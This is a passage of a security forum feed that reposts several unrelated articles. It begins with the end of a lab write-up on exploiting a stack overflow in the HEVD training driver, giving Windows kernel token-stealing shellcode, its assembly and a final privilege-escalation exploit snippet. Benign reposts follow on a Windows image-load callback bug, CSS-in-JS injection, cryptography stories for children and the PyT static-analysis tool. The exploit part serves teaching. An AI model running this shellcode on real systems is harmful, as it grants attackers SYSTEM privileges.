00110110 01110010 01000001 Chars: A6rA Time: Wed Sep 1 18:07:13 2004 Float: low 11.4029 high 0 Double: 5.40551e-315 Reversing the order due to endianness, we get Ar6A which pattern_offset.rb tells us is offset 528 (0x210). Therefore, our source buffer will be of size 0x210+4, where the 4 is due to the address of our shellcode. Constructing Shellcode Since there is 0x1000-0x210-4 unused space in our allocated page, we can just put our shellcode in the beginning of the page. I use common Windows token stealing shellcode that basically iterates through the _EPROCESSs, looks for the SYSTEM process, and copies the SYSTEM process' token. Additionally, for convenience in breaking at the shellcode, I prepend the shellcode with a breakpoint (\xcc). \xcc\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00 \x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8 \x00\x00\x00\x89\x91\xf8\x00\x00\x00 Our shellcode still isn't complete yet; the shellcode doesn't know where to return to after it executes. To search for a return address, let's inspect the call stack in the debugger when the shellcode executes. kd> k # ChildEBP RetAddr WARNING: Frame IP not in any known module. Following frames may be wrong. 00 a88cf114 82ab3622 0x1540000 01 a88cf138 82ab35f4 nt!ExecuteHandler2+0x26 02 a88cf15c 82ae73b5 nt!ExecuteHandler+0x24 03 a88cf1f0 82af005c nt!RtlDispatchException+0xb6 04 a88cf77c 82a79dd6 nt!KiDispatchException+0x17c 05 a88cf7e4 82a79d8a nt!CommonDispatchException+0x4a 06 a88cf868 995c9969 nt!KiExceptionExit+0x192 07 a88cf86c a88cf8b4 HEVD+0x4969 08 a88cf870 01540dec 0xa88cf8b4 09 a88cf8b4 41414141 0x1540dec 0a a88cf8b8 41414141 0x41414141 0b a88cf8bc 41414141 0x41414141 ... 51 a88cfad0 995c99ca 0x41414141 52 a88cfae0 995ca16d HEVD+0x49ca 53 a88cfafc 82a72593 HEVD+0x516d 54 a88cfb14 82c6699f nt!IofCallDriver+0x63 hevd+4969 is the instruction address after the memcpy, but we can't return here because the portion of stack the remaining code uses is corrupted. Fixing the stack to the correct values would be extremely annoying. Instead, returning to hevd+49ca which is the return address of the stack frame right below hevd+4969 makes more sense. However, if you adjust the stack and return to hevd+49ca, you'll still get a crash. The problem is at hevd+5260 where edi+0x1c is dereferenced. edi at this point is 0 because registers are XORed with themselves before the exception handler assumes control and neither the program nor our shellcode touched edi. In a normal execution, edi and other registers are restored in __SEH_epilog4. These values are of course restored from the stack. Taking a88cf86c from the stack trace before, we can dump and attempt to find the restore values. They're actually are quite easy to find here because hevd+5dcc is quite easy to spot. hevd+5dcc is the address of the debug print string which is restored into ebx. kd> dds a88cf86c a88cf86c 995c9969 HEVD+0x4969 a88cf870 a88cf8b4 a88cf874 01540dec a88cf878 00000218 a88cf87c 995ca760 HEVD+0x5760 a88cf880 995ca31a HEVD+0x531a a88cf884 00000200 a88cf888 995ca338 HEVD+0x5338 a88cf88c a88cf8b4 a88cf890 995ca3a2 HEVD+0x53a2 a88cf894 00000218 a88cf898 995ca3be HEVD+0x53be a88cf89c 01540dec a88cf8a0 31d15d0b a88cf8a4 8c843f68 <-- edi a88cf8a8 8c843fd8 <-- esi a88cf8ac 995cadcc HEVD+0x5dcc <-- ebx a88cf8b0 455f5359 a88cf8b4 41414141 a88cf8b8 41414141 To obtain the offset of edi, just subtract esp from the current address of the restore value. kd> ? a88cf8a4 - esp Evaluate expression: 1932 = 0000078c kd> dds a88cfad0 la a88cfad0 a88cfae0 a88cfad4 995c99ca HEVD+0x49ca a88cfad8 01540dec a88cfadc 00000218 a88cfae0 a88cfafc a88cfae4 995ca16d HEVD+0x516d a88cfae8 8c843f68 a88cfaec 8c843fd8 a88cfaf0 86c3c398 a88cfaf4 8586f5f0 kd> ? a88cfad0 - esp Evaluate expression: 2488 = 000009b8 Similarly, finding the offset to return to is found by obtaining the difference of a88cfad0and esp. Lastly, our shellcode should pop ebp; ret 8; which results in start: xor eax, eax; mov eax,dword ptr fs:[eax+0x124]; # nt!_KPCR.PcrbData.CurrentThread mov eax,dword ptr [eax+0x50]; # nt!_KTHREAD.ApcState.Process mov ecx,eax; # Store unprivileged _EPROCESS in ecx loop: mov eax,dword ptr [eax+0xb8]; # Next nt!_EPROCESS.ActiveProcessLinks.Flink sub eax, 0xb8; # Back to the beginning of _EPROCESS cmp dword ptr [eax+0xb4],0x04; # SYSTEM process? nt!_EPROCESS.UniqueProcessId jne loop; stealtoken: mov edx,dword ptr [eax+0xf8]; # Get SYSTEM nt!_EPROCESS.Token mov dword ptr [ecx+0xf8],edx; # Copy token restore: mov edi, [esp+0x78c]; # edi irq mov esi, [esp+0x790]; # esi mov ebx, [esp+0x794]; # move print string into ebx add esp, 0x9b8; pop ebp; ret 0x8; Gaining NT Authority\SYSTEM Putting everything together, the final exploit looks like this. m = mmap(size=0x2000) munmap(m+0x1000) size = 0x210+4 sc = '\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x8b\xbc\x24\x8c\x07\x00\x00\x8b\xb4\x24\x90\x07\x00\x00\x8b\x9c\x24\x94\x07\x00\x00\x81\xc4\xb8\x09\x00\x00\x5d\xc2\x08\x00' write(m, sc + 'A'*(0x1000-4-len(sc)) + struct.pack("<I", m)) trigger_stackoverflow_gs(m+0x1000-size, size+1) print '\n[+] Privilege Escalated\n' os.system('cmd.exe') And that should give us: Sursa: https://klue.github.io/blog/2017/09/hevd_stack_gs/1 point
-
Omri Misgav September 5, 2017 Windows’ PsSetLoadImageNotifyRoutine Callbacks: the Good, the Bad and the Unclear (Part 1) tl;dr: Security vendors and kernel developers beware – a programming error in the Windows kernel could prevent you from identifying which modules have been loaded at runtime. Introduction During research into the Windows kernel, we came across an interesting issue with PsSetLoadImageNotifyRoutine which as its name implies, notifies of module loading. The thing is, after registering a notification routine for loaded PE images with the kernel the callback may receive invalid image names. After digging into the matter, what started as a seemingly random issue proved to originate from a coding error in the Windows kernel itself. This flaw exists in the most recent Windows 10 release and past versions of the OS, dating back to Windows 2000. The Good: Notification of Module Loading Say you are a security vendor developing a driver, you would like to be aware of every module the system loads. Hooking? Maybe… but there are many security and implementation deficiencies. Here’s where Microsoft introduced PsSetLoadImageNotifyRoutine, in Windows 2000. This mechanism, notifies registered drivers, from various parts in the kernel, when a PE image file has been loaded to virtual memory (kernel\user space). Behind the Scenes: There are several cases that will cause the notification routine to be invoked: Loading drivers Starting new processes Process executable image System DLL: ntdll.dll (2 different binaries for WoW64 processes) Runtime loaded PE images – import table, LoadLibrary, LoadLibraryEx[1], NtMapViewOfSection[2] Figure 1: All calls to PsCallImageNotifyRoutines in ntoskrnl.exe When invoking the registered notification routines, the kernel provides them with a number of parameters in order to properly identify the PE image that is being loaded. These parameters can be seen in the prototype definition of the callback function: VOID (*PLOAD_IMAGE_NOTIFY_ROUTINE)( _In_opt_ PUNICODE_STRING FullImageName, // The image name _In_ HANDLE ProcessId, // A handle to the process the PE has been loaded to _In_ PIMAGE_INFO ImageInfo // Information describing the loaded image (base address, size, kernel/user-mode image, etc) ); The Only Way to Go In essence, this is the only documented method in the WDK to actually monitor PEs that are loaded to memory as executable code. A different method, recommended by Microsoft, is to use a file-system mini-filter callback (IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION). In order to tell that a section object is part of a loaded executable image, one must check for the existence of the SEC_IMAGE flag passed to NtCreateSection. However, the file-system mini-filter callback does not receive this flag, and it is therefore impossible to determine whether the section object is being created for the loading of a PE image or not. The Bad: Wrong Module Parameter The only parameter that can effectively identify the loaded PE file is the FullImageName parameter. However, in each of the scenarios described earlier the kernel uses a different format for FullImageName. At first glance, we noticed that while we do get the full path of the process executable file and constant values for system DLLs (that are missing the volume name), for the rest of the dynamically loaded user-mode PEs the paths provided are missing the volume name. What’s more alarming is that not only does that path come without the volume name, sometimes the path is completely malformed, and could point to a different or non-existing file. RTFM So as every researcher\developer does, the first thing we did was to go back to the documentation and make sure we understood it properly. According to MSDN, the description of FullImageName implies it is the path of the file on disk since it “identifies the executable image file”. There is no mention of these invalid or non-existing paths. The documentation does state that it may be NULL: “(The FullImageName parameter can be NULL in cases in which the operating system is unable to obtain the full name of the image at process creation time.)”. But clearly, if the parameter is not NULL, it means the kernel was able to successfully retrieve the correct image name. There’s More than Just Typos in the Documentation Another thing that caught our attention while perusing the documentation was that the function prototype as shown on MSDN is wrong. The Create parameter, which according to its description doesn’t even seem to be related to this mechanism, doesn’t exist in the function prototype from the WDK. Ironically, using the prototype specified on MSDN causes a crash due to stack corruption. Under the Hood nt!PsCallImageNotifyRoutines is in charge of invoking the registered callbacks. It merely passes along the UNICODE_STRING pointer it receives from its own caller to the callbacks as the FullImageName parameter. When nt!MiMapViewOfImageSection maps a section as an image this UNICODE_STRING is the FileName field of the FILE_OBJECT represented by that section. Figure 2: FullImageName passed to the notification routine is actually the FILE_OBJECT’s FileName field. The FILE_OBJECT is obtained by going through the SECTION -> SEGMENT -> CONTROL_AREA. These are internal and undocumented kernel structures. The Memory Manager creates these structures when mapping a file into memory, and uses these structures internally as long as the file is mapped. Figure 3: nt!MiMapViewOfImageSection obtaining the FILE_OBJECT before calling nt!PsCallImageNotifyRoutines There’s a single SEGMENT structure per mapped image. This means that multiple sections of the same image that exists simultaneously, within the same process or across processes, use the same SEGMENT and CONTROL_AREA. This explains why the argument FullImageName was identical when the same PE file as loaded into different processes at the same time. Figure 4: File mapping internal structures (simplified) RTFM Again In order to understand how the FileName field is set and managed we went back to the documentation and according to MSDN using it is forbidden! “[The value] in this string is valid only during the initial processing of an IRP_MJ_CREATE request. This file name should not be considered valid after the file system starts to process the IRP_MJ_CREATE request” and at this point the FILE_OBJECT is clearly used after the file-system completed the IRP_MJ_CREATE request. Now it’s obvious that the NTFS driver takes ownership of this UNICODE_STRING (FILE_OBJECT.FileName). Using a kernel debugger, we found that ntfs!NtfsUpdateCcbsForLcbMove is the function responsible for the renaming operation. While looking at this function we inferred that during the IRP_MJ_CREATE request the file-system driver simply creates a shallow copy of FILE_OBJECT.FileName and maintains it separately. This means that only the address of the buffer is copied, not the buffer itself. Figure 5: ntfs!NtfsUpdateCcbsForLcbMove updating the file name value Root Cause Analysis As long as the new path length won’t exceed the MaximumLength, the shared buffer will be overwritten without updating the Length field of FILE_OBJECT.FileName, which is where the kernel gets the string for the notification routine. If the new path length exceeds the MaximumLength, a new buffer will be allocated and the notification routine will get a completely outdated value. Even though we finally figured out the cause for this bug something still didn’t add up. Why is it that even after all the handles to the image (from SECTIONs and FILE_OBJECTs) were closed we are still seeing these malformed paths? If all handles to the file were indeed closed, the next time the PE image will be opened and loaded a new FILE_OBJECT should be created without references and with the most up to date path. Instead, the FullImageName still pointed to the old UNICODE_STRING. This proved that the FILE_OBJECT wasn’t closed although its handle count was 0, which means the reference count must have been higher than 0. We were also able to confirm this using a debugger. Bottom Line As a ref count leak in the kernel isn’t very likely we are left with one immediate suspect: The Cache Manager. What seems to be caching behavior, along with the way the file-system driver maintains the file name and a severe coding error is what ultimately causes the invalid name issue. Pausing to reflect At this point we were sure we figured out what causes the problem though what eluded us was how can it be that this bug still exists? And there’s no obvious solution for it? In our next post, we’ll cover our endeavors to find good answers for these questions. ————————————————– [1] Depending on the dwFlags parameter [2] Depending on the dwAllocationAttributes of NtCreateSection Note: majority of the analysis was done on a Windows 7 SP1 x86 fully patched and updated machine. The findings were also verified to be present on Windows XP SP3, Windows 7 SP1 x64, Windows 10 Anniversary Update (Redstone) both x86 and x64 all fully patched and updated as well. Sursa: https://breakingmalware.com/documentation/windows-pssetloadimagenotifyroutine-callbacks-good-bad-unclear-part-1/1 point
-
^ cand discuti cu un client online, in primul rand tii cont de nume. In cazul de fata poti sta linistit!1 point
-
How can I use CSS-in-JS securely? " CSS-in-JS is an exciting new technology that completely eliminates the need for CSS class names. It makes it possible to add styles directly to your components, using the full power of CSS. Unfortunately, it also promotes interpolation of unescaped props into that CSS, opening you up to injection attacks. And CSS injection attacks are a major security hazard. " Source: https://reactarmory.com/answers/how-can-i-use-css-in-js-securely1 point
-
Ma frate, vad ca esti din Braila, ca si mine de altfel, pai like-urile merg la noi la Braila ? du' si tu o fata la club, taie pe cineva ... lasa calculatoru ca nu-ti face bine.1 point
-
1. Professor Krankenstein was the most influential genetic engineer of his time. When, in the spring of 2030, he almost incidentally invented the most terrible biological weapon known to humanity it took him about three seconds to realize that should his invention fall into the hands of one of the superpowers -- or into the hands of any common idiot, really -- it could well mean the end of the human race. He wasted no time. He destroyed all the artifacts in the lab. He burned all the notes and hard disks of all the computers they’ve used in the project. He seeded false information all over the place to lead future investigators off the track. Now, left with the last remaining copy of the doomsgerm recipe, he was contemplating whether to destroy it. Yes, destroying it would keep the world safe. But if such a breakthrough in genetic engineering was used in a different way it could have solved the hunger problem by producing enough artificial food to feed the swelling population of Earth. And if global warming went catastrophic, it could have been used to engineer microorganisms super-efficient at sequestering carbon dioxide and methane from atmosphere. In the end he decided not to destroy but rather to encrypt the recipe, put it into a tungsten box, encase the box in concrete and drop it from a cruise ship into Mariana Trench. The story would have ended there if it was not for one Hendrik Koppel, a rather simple-minded person whom professor Krankenstein hired to help him to move the tungsten-concrete box around. Professor didn’t even met him before he destroyed all his doomsgerm research. Still, Hendrik somehow realized that the issue was of interest to superpowers (Was professor Krankenstein sleep-talking?) and sold the information about the location of the box to several governments. By the beginning of October the news hit that an American aircraft carrier is heading in the direction of Mariana Trench. Apparently, there was also a Russian nuclear submarine on its way to the same location. Chinese government have sent a fleet of smaller, more versatile, oceanographic vessels. After the initial bout of despair, professor Krankenstein realised that with his superior knowledge of the position of the box he could possibly get to the location first and destroy the box using an underwater bomb. He used his life savings to buy a rusty old ship called Amor Patrio, manned it with his closest collaborators and set up for Pacific Ocean. ... Things haven't gone well. News reported that Americans and Chinese were approaching the area while Amor Patrio's engine broke and the crew was working around the clock to fix it. Finally, they fixed it and approached Mariana Trench. It was at that point that the news reached them: The box was found by Russians and transported to Moscow. It was now stored in the vault underneath KGB headquarters. There was a whole division of spetsnaz guarding the building. The building itself was filled with special agents, each trained in twelve ways of silently killing a person. Professor Krankenstein and his associated held a meeting on board of Amor Patrio, in the middle of Pacific Ocean. People came up with desperate proposals: Let's dig a tunnel underneath Moscow river. Let's blackmail Russians by re-creating the virus and threatening them to disperse it in Russia. Nuke the entire Moskovskaya Oblast! There was no end to wild and desperate proposals. Once the stream of proposals dried up, everyone looked at professor Krankenstein, awaiting his decision. The silence is almost palpable. Professor Krankenstein slowly took out his iconic pipe and lighted it with the paper which had the decryption key written on it. 13. No full story yet, but let's assume a king is at a quest. At some point he realizes that a small item, say a specific hairpin, is needed to complete the quest. He clearly remembers he used to own the hairpin, but he has no idea whether it's still in his possession and if so, where exactly it is. He sends a messenger home asking his counsellors to look for the hairpin and let him know whether they've found it or not. King's enemies need that information as well so the next day, when the messager is returning, they ambush him and take the message. Unfortunately, the message is encrypted. The messager himself knows nothing about the pin. Many experienced cryptographers are working around the clock for days in row to decrypt the message but to no avail. Finally, a kid wanders into the war room. She asks about what they are doing and after some thinking she says: "I know nothing about the high art of cryptography and in no way I can compare to esteemed savants in this room. What I know, though, is that King's pallace has ten thousand rooms, each full of luxury, pictures and finely carved furniture. To find a hairpin in such a place can take weeks if not months. If there was no hairpin it would take at least that long before they could send the messenger back with negative reply. So, if the messager was captured on his way back on the very next day, it can mean only a single thing: The hairpin was found and your encrypted message says so." 20. Here Legrand, having re-heated the parchment, submitted It my inspection. The following characters were rudely traced, in a red tint, between the death's-head and the goat: 53++!305))6*;4826)4+.)4+);806*;48!8`60))85;]8*:+*8!83(88)5*!; 46(;88*96*?;8)*+(;485);5*!2:*+(;4956*2(5*-4)8`8*; 4069285);)6 !8)4++;1(+9;48081;8:8+1;48!85;4)485!528806*81(+9;48;(88;4(+?3 4;48)4+;161;:188;+?; "But," said I, returning him the slip, "I am as much in the dark as ever. Were all the jewels of Golconda awaiting me on my solution of this enigma, I am quite sure that I should be unable to earn them." "And yet," said Legrand, "the solution is by no means so difficult as you might be led to imagine from the first hasty inspection of the characters. These characters, as any one might readily guess, form a cipher --that is to say, they convey a meaning; but then, from what is known of Kidd, I could not suppose him capable of constructing any of the more abstruse cryptographs. I made up my mind, at once, that this was of a simple species --such, however, as would appear, to the crude intellect of the sailor, absolutely insoluble without the key." "And you really solved it?" "Readily; I have solved others of an abstruseness ten thousand times greater. Circumstances, and a certain bias of mind, have led me to take interest in such riddles, and it may well be doubted whether human ingenuity can construct an enigma of the kind which human ingenuity may not, by proper application, resolve. In fact, having once established connected and legible characters, I scarcely gave a thought to the mere difficulty of developing their import. "In the present case --indeed in all cases of secret writing --the first question regards the language of the cipher; for the principles of solution, so far, especially, as the more simple ciphers are concerned, depend on, and are varied by, the genius of the particular idiom. In general, there is no alternative but experiment (directed by probabilities) of every tongue known to him who attempts the solution, until the true one be attained. But, with the cipher now before us, all difficulty is removed by the signature. The pun on the word 'Kidd' is appreciable in no other language than the English. But for this consideration I should have begun my attempts with the Spanish and French, as the tongues in which a secret of this kind would most naturally have been written by a pirate of the Spanish main. As it was, I assumed the cryptograph to be English. "You observe there are no divisions between the words. Had there been divisions, the task would have been comparatively easy. In such case I should have commenced with a collation and analysis of the shorter words, and, had a word of a single letter occurred, as is most likely, (a or I, for example,) I should have considered the solution as assured. But, there being no division, my first step was to ascertain the predominant letters, as well as the least frequent. Counting all, I constructed a table, thus: Of the character 8 there are 33. ; " 26. 4 " 19. + ) " 16. * " 13. 5 " 12. 6 " 11. ! 1 " 8. 0 " 6. 9 2 " 5. : 3 " 4. ? " 3. ` " 2. - . " 1. "Now, in English, the letter which most frequently occurs is e. Afterwards, the succession runs thus: a o i d h n r s t u y c f g l m w b k p q x z. E however predominates so remarkably that an individual sentence of any length is rarely seen, in which it is not the prevailing character. "Here, then, we have, in the very beginning, the groundwork for something more than a mere guess. The general use which may be made of the table is obvious --but, in this particular cipher, we shall only very partially require its aid. As our predominant character is 8, we will commence by assuming it as the e of the natural alphabet. To verify the supposition, let us observe if the 8 be seen often in couples --for e is doubled with great frequency in English --in such words, for example, as 'meet,' 'fleet,' 'speed, 'seen,' 'been,' 'agree,' &c. In the present instance we see it doubled less than five times, although the cryptograph is brief. "Let us assume 8, then, as e. Now, of all words in the language, 'the' is the most usual; let us see, therefore, whether they are not repetitions of any three characters in the same order of collocation, the last of them being 8. If we discover repetitions of such letters, so arranged, they will most probably represent the word 'the.' On inspection, we find no less than seven such arrangements, the characters being ;48. We may, therefore, assume that the semicolon represents t, that 4 represents h, and that 8 represents e --the last being now well confirmed. Thus a great step has been taken. "But, having established a single word, we are enabled to establish a vastly important point; that is to say, several commencements and terminations of other words. Let us refer, for example, to the last instance but one, in which the combination ;48 occurs --not far from the end of the cipher. We know that the semicolon immediately ensuing is the commencement of a word, and, of the six characters succeeding this 'the,' we are cognizant of no less than five. Let us set these characters down, thus, by the letters we know them to represent, leaving a space for the unknown-- t eeth. "Here we are enabled, at once, to discard the 'th,' as forming no portion of the word commencing with the first t; since, by experiment of the entire alphabet for a letter adapted to the vacancy we perceive that no word can be formed of which this th can be a part. We are thus narrowed into t ee, and, going through the alphabet, if necessary, as before, we arrive at the word 'tree,' as the sole possible reading. We thus gain another letter, r, represented by (, with the words 'the tree' in juxtaposition. "Looking beyond these words, for a short distance, we again see the combination ;48, and employ it by way of termination to what immediately precedes. We have thus this arrangement: the tree ;4(+?34 the, or substituting the natural letters, where known, it reads thus: the tree thr+?3h the. "Now, if, in place of the unknown characters, we leave blank spaces, or substitute dots, we read thus: the tree thr...h the, when the word 'through' makes itself evident at once. But this discovery gives us three new letters, o, u and g, represented by + ? and 3. "Looking now, narrowly, through the cipher for combinations of known characters, we find, not very far from the beginning, this arrangement, 83(88, or egree, which, plainly, is the conclusion of the word 'degree,' and gives us another letter, d, represented by !. "Four letters beyond the word 'degree,' we perceive the combination 46(;88*. "Translating the known characters, and representing the unknown by dots, as before, we read thus: th.rtee. an arrangement immediately suggestive of the word 'thirteen,' and again furnishing us with two new characters, i and n, represented by 6 and *. "Referring, now, to the beginning of the cryptograph, we find the combination, 53++!. "Translating, as before, we obtain .good, which assures us that the first letter is A, and that the first two words are 'A good.' "To avoid confusion, it is now time that we arrange our key, as far as discovered, in a tabular form. It will stand thus: 5 represents a ! " d 8 " e 3 " g 4 " h 6 " i * " n + " o ( " r ; " t "We have, therefore, no less than ten of the most important letters represented, and it will be unnecessary to proceed with the details of the solution. I have said enough to convince you that ciphers of this nature are readily soluble, and to give you some insight into the rationale of their development. But be assured that the specimen before us appertains to the very simplest species of cryptograph. It now only remains to give you the full translation of the characters upon the parchment, as unriddled. Here it is: 'A good glass in the bishop's hostel in the devil's seat twenty-one degrees and thirteen minutes northeast and by north main branch seventh limb east side shoot from the left eye of the death's-head a bee line from the tree through the shot fifty feet out.'" "But," said I, "the enigma seems still in as bad a condition as ever. How is it possible to extort a meaning from all this jargon about 'devil's seats,' 'death's-heads,' and 'bishop's hostel'?" "I confess," replied Legrand, "that the matter still wears a serious aspect, when regarded with a casual glance. My first endeavor was to divide the sentence into the natural division intended by the cryptographist." "You mean, to punctuate it?" "Something of that kind." "But how was it possible to effect this?" "I reflected that it had been a point with the writer to run his words together without division, so as to increase the difficulty of solution. Now, a not overacute man, in pursuing such an object, would be nearly certain to overdo the matter. When, in the course of his composition, he arrived at a break in his subject which would naturally require a pause, or a point, he would be exceedingly apt to run his characters, at this place, more than usually close together. If you will observe the MS., in the present instance, you will easily detect five such cases of unusual crowding. Acting on this hint, I made the division thus: 'A good glass in the bishop's hostel in the devil's --twenty-one degrees and thirteen minutes --northeast and by north --main branch seventh limb east side --shoot from the left eye of the death's-head --a bee-line from the tree through the shot fifty feet out.'" "Even this division," said I, "leaves me still in the dark." 32. A portal suddenly opened on the starboard ejecting a fleet of imperial pursuit vessels. The propulsion system of my ship got hit before the shield activated. I’ve tried to switch on the backup drive but before it charged to 5% I was already dangling off a dozen tractor beams. It wasn’t much of a fight. They’ve just came and picked me up as one would pick up a box of frozen strawberries in a supermarket. I must have passed out because of pressure loss because the next thing I remember is being in a plain white room with my hands cuffed behind my back. There was a sound of door opening and a person walked into my field of vision. It took me few seconds to realize who the man was. He was wearing an old-fashioned black suit and a bowler hat, black umbrella in his hand, not the baggy trousers seen on his official portraits. But then he smiled and showed the glistening golden teeth on the left side and his own healthy camel-like teeth on the right and the realization hit me. It was him. Beylerbey Qgdzzxoglu in person. “Peace be upon you,” he said. Then he sat down on the other side of a little coffee table, made himself comfortable and put his umbrella on the floor. “We have a little matter to discuss, you and I,” he said. He took a paper out of his pocket and put in on the coffee table, spinning it so that I can read it. “Attack the Phlesmus Pashalik,” said one line. “Attack the Iconium Cluster,” said the line below it. The rest of the sheet was empty except for holographic seal of High Command of Proximian Insurgency. "Comandante Ribeira is no fool," he said, "And this scrap of paper is not going to convince me that he's going to split his forces and attack both those places at the same time. Our strategic machines are vastly more powerful than Proximian ones, they've been running hot for the past week and out lab rats tell us that there's no way to win that way." "You are right, O leader of men," I said. I knew that this kind of empty flattery was used at the Sublime Porte but I was not sure whether it wasn't reserved for the sultan alone. Qgdzzxoglu smiled snarkily but haven't said anything. Maybe I was going to live in the end. "I have no loyalty for the Proximian cause and before the rebelion I have lived happily and had no thoughts of betrayal. And now, hoping for your mercy, I am going to disclose the true meaning of this message to you." "It is a code, O you, whose slipper weights heavily upon the neck of nations," I said, "The recepient is supposed to ignore the first sentence and only follow the second one." I hoped I haven't overdone it. Being honest with the enemy is hard. "So you are trying to convince me that de Ribeira is going to attack Iconium," he gave me a sharp look, apparently trying to determine whether I was lying or not. "And you know what? We've got our reports. And our reports are saying that rebels will try to trick us into moving all our forces into Iconium and then attack pashalik of Phlesmus while it's undefended. And if that's what you are trying to do bad things are going to happen to your proboscis." "The Most Holy Cross, John XXIII and Our Lady of Africa have already got a command to move to Iconium cluster. And you should expect at least comparable fire force from elsewhere." ... The messenger has no intention to suffer to win someone else's war. At the same time it's clear that if he continues to tell truth he will be tortured. So he says that general is right and it's the first sentence that should be taken into account. The general begins to feel a bit uneasy at this point. He has two contradictory confessions and it's not at all clear which one is correct. He orders the torture to proceed only to make the messager change his confession once again. ... “Today, the God, the Compassionate, the Merciful have taught me that there are secrets that cannot be given away. You cannot give them away to save yourself from torture. You cannot give them away to save your kids from being sold to slavery. You cannot give them away to prevent the end of the world. You just cannot give them away and whether you want to or not matters little.” 54. Here's a simple game for kids that shows how asymmetric encryption works in principle, makes the fact that with only public key at your disposal encryption may be easy while decryption may be so hard as to be basically impossible, intuitive and gives everyone a hands-on experience with a simple asymmetric encryption system. Here's how it works: Buy a dictionary of some exotic language. The language being exotic makes it improbable that any of the kids involved in the game would understand it. Also, it makes cheating by using Google Translate impossible. Let's say you've opted for Eskimo language. The story of the game can be located at the North Pole after all. You should prefer a dictionary that comes in two bands: English-Eskimo dictionary and Eskimo-English dictionary. The former will play the role of public key and the latter the role of secret key. Obviously, if there's no two-band dictionary available, you'll have to cut a single-band one in two. To distribute the public key to everyone involved in the game you can either buy multiple copies of English-Eskimo dictionary, which may be expensive, or you can simply place a single copy at a well-known location. In school library, at a local mom-and-pop shop or at a secret place known only to the game participants. If a kid wants to send an encrypted message to the owner of the secret key, they just use the public key (English-Eskimo dictionary) to translate the message, word-by-word, from English to Eskimo. The owner of the secret key (Eskimo-English dictionary) can then easily decrypt the message by translating it back into English. However, if the message gets intercepted by any other game participant, decrypting it would be an extremely time consuming activity. Each word of the message would have to be found in English-Eskimo dictionary, which would in turn mean scanning the whole dictionary in a page-by-page and word-by-word manner! 78. It's a puppet show. There are two hills on the stage with country border between them. Law-abiding citizen is on the right hill. Smuggler enters the stage on the left. SMUGGLER: Hey, you! CITIZEN: Who? Me? SMUGGLER: Do you like booze? CITIZEN: Sure I do. And who are you? SMUGGLER: I'm the person who will sell you some booze. CITIZEN: What about cigarettes? SMUGGLERS: Sure thing. Cheap Ukrainian variety for $1 a pack. Also Slovenian Mariboro brand. CITIZEN: Thanks God! I am getting sick of our government trying to make me healthy! Border patrol emerges from a bush in the middle of the stage. PATROL: Forget about it, guys! This is a state border. Nothing's gonna pass one way or the other. You better pack your stuff and go home. SMUGGLER: Ignore him. We'll meet later on at some other place, without border patrol around, and you'll get all the booze and cigarettes you want. PATROL: Ha! I would like to see that. Both of you are going to end up in jail. CITIZEN: He's right. If you tell me where to meet, he's going to hear that, go there and arrest us. ... Smuggler has a list of possible places to meet: Big oak at 57th mile of the border. Lower end of Abe Smith's pasture. ... ... He obfuscates each entry and shout them to the citizen in no particular order. Citizen chooses one of the puzzles and de-obfuscates it. It takes him 10 minutes. The de-obfuscates message reads: "18. Behind the old brick factory." CITIZEN (cries): Eighteen! SMUGGLER: Ok, got it, let's meet there in an hour! PATROL: Oh my, oh my. I am much better at de-obfuscation than that moron citizen. I've already got two messages solved. But one has number 56, the other number 110. I have no idea which one is going to be number 18. There's no way I can find the right one in just one hour! The curtain comes down. Happy gulping sounds can be heard from the backstage. 99. Mr. X is approached in the subway by a guy who claims to be an alien stranded on Earth and to possess time machine that allows him to know the future. He needs funds to fix his flying saucer but filling in winning numbers for next week's lottery would create a time paradox. Therefore, he's willing to sell next week's winning numbers to Mr. X at a favourable price. Mr. X, as gullible as he is, feels that this may be a scam and asks for a proof. Alien gives him the next week's winning numbers in encrypted form so that Mr. X can't use them and then decide not to pay for them. After the lottery draw he'll give Mr. X the key to unlock the file and Mr. X can verify that the prediction was correct. After the draw, Mr. X gets the key and lo and behold, the numbers are correct! To rule out the possibility that it happened by chance, they do the experiment twice. Then thrice. Finally, Mr. X is persuaded. He pays the alien and gets the set of numbers for the next week's draw. But the numbers drawn are completely different. And now the question: How did the scam work? NOTE: The claim about the time paradox is super weak. To improve the story the alien can ask for something non-monetary (sex, political influence). Or, more generally, positive demonstration of knowledge of the future can be used to make people do what you want. E.g. "I know that an asteroid is going to destroy Earth in one year. Give me all your money to build a starship to save you." Sursa: https://sustrik.github.io/crypto-for-kids/1 point
-
Python Taint Static analysis of Python web applications based on theoretical foundations (Control flow graphs, fixed point, dataflow analysis) Features: Detect Command injection Detect SQL injection Detect XSS Detect directory traversal Get a control flow graph Get a def-use and/or a use-def chain Search GitHub and analyse hits with PyT Scan intraprocedural or interprocedural A lot of customisation possible Example usage and output: Install: git clone https://github.com/python-security/pyt.git python setup.py install pyt -h Usage from Source: Using it like a user python -m pyt -f example/vulnerable_code/XSS_call.py save -du Running the tests python -m tests Running an individual test file python -m unittest tests.import_test Running an individual test python -m unittest tests.import_test.ImportTest.test_import Contributions: Join our slack group: https://pyt-dev.slack.com/ - ask for invite: mr.thalmann@gmail.com Guidelines Virtual env setup guide: Create a directory to hold the virtual env and project mkdir ~/a_folder cd ~/a_folder Clone the project into the directory git clone https://github.com/python-security/pyt.git Create the virtual environment python3 -m venv ~/a_folder/ Check that you have the right versions python --version sample output Python 3.6.0 pip --version sample output pip 9.0.1 from /Users/kevinhock/a_folder/lib/python3.6/site-packages (python 3.6) Change to project directory cd pyt Install dependencies pip install -r requirements.txt pip list sample output: gitdb (0.6.4) GitPython (2.0.8) graphviz (0.4.10) pip (9.0.1) requests (2.10.0) setuptools (28.8.0) smmap (0.9.0) In the future, just type source ~/a_folder/bin/activate to start developing. Download pyt-master.zip Source: https://github.com/python-security/pyt1 point
-
1 point
-
